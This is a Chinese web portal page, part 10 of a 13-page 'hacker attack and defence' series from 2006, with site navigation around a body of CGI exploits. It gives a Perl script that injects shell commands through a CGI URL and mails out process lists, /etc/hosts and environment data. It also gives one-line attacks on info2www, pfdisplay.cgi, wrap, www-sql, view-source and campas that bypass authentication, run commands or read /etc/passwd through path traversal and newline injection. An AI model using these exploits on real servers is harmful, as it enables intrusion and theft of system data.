黑客攻防技术内幕-安全防入侵与防病毒基础(10) - 网络应用 - 网络知识 - 华夏媒体华夏媒体人 - 媒体、艺术、设计、技术与一体的门户

会员名称：密码：验证码：

会员注册忘记密码？

■ 设为首页
■ 加入收藏
■ 返回首页

媒体资讯>> 业界资讯 - 会展动态 - 竞赛&活动 - IT互联网媒体学院>> 图形图像 - 网页制作 - 网络编程 - 数据库 - 服务器 - 网络应用作品赏析>> 视频音响 - CG动画 - UI设计 - 平面设计 - 网页设计 - 摄影映象 - 三维2D - 其它设计媒体工作室>> 视频影像 - 音频声响 - 三维2D - 平面视觉 - 软硬技术 - 摄影映象人物访谈>> 人物访谈 - 华夏新锐媒体杂志>> 媒体杂志素材图库>> 丽景佳图 - 设计素材 - 资料图库 - 矢量图库 - 动态动画 - 特色图标酷站赏析>> 韩国网站 - 国外网站 - 国内网站会员中心>> 会员注册 - 会员登陆

当前位置：华夏媒体 - > 媒体学院 - > 网络应用 - > 网络知识 - > 黑客攻防技术内幕-安全防入侵与防病毒基础(10)

黑客攻防技术内... [网络...]

More...

网络协议X档案... [其它...]

不可忽视的BIO... [其它...]

微软IE浏览器非... [其它...]

微软IE浏览器非... [其它...]

网管十招 [其它...]

微软安全问题 ... [其它...]

修改注册表使电... [其它...]

利用注册表管理... [其它...]

有关IIS HACK的... [其它...]

黑客攻防技术内幕-安全防入侵与防病毒基础(10)

编辑：华夏媒体作者：未知来源：网络时间：2006-07-29 总浏览量：2270

文字大小：[ 大中小 ] 文字颜色：双击滚屏/单击停止

[上一页] [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [下一页]

$URL='http://dtp.kappa.ro/a/test.shtml'; # please _DO_ _modify_ this
$EMAIL='pdoru@pop3.kappa.ro,root'; # please _DO_ _modify_ this
if ($ARGV[0]) { $CMD=$ARGV[0];}else{
$CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\|mail ${EMAIL} -sanothe
re_one";
}$text="${URL}/;IFS=\8;${CMD};echo|";$text =~ s/ /\$\{IFS\}/g;#print "$text\
n";
system({"wget"} "wget", $text, "-O/dev/null");
system({"wget"} "wget", $text, "-O/dev/null");
#system({"lynx"} "lynx", $text); #如果没有wget命令也可以用lynx
#system({"lynx"} "lynx", $text);

● 一些版本(1.1)的info2www的漏洞

$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami asswd|)'

You have new mail.

● pfdispaly.cgi

lynx -source \
'http://www.victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'
pfdisplay.cgi还有另外一个漏洞可以执行命令
lynx -dump http://www.victim.com/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'

or
lynx -dump \
http://victim/cgi-bin/pfdispaly.cgi?'%0A/usr/bin/X11/xclock%20-display%20evi
l:0.0|'

● wrap

lynx http://server/cgi-bin/wrap?/../../../../../etc

● www-sql

可以让入侵者读一些受限制的页面如：

在浏览器里输入：http://server/protected/something.html，入侵者就会被要求输入账号和口令，而有www-sql就不必了：

http://server/cgi-bin/www-sql/protected/something.html

● view-source

lynx http://server/cgi-bin/view-source?../../../../../../../etc/passwd

● campas

lynx http://www.victim.com/cgi-bin/campas?%0acat%0a/etc/passwd%0a

● webgais

telnet www.victim.com 80

[上一页] [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [下一页]

打印收藏关闭至顶部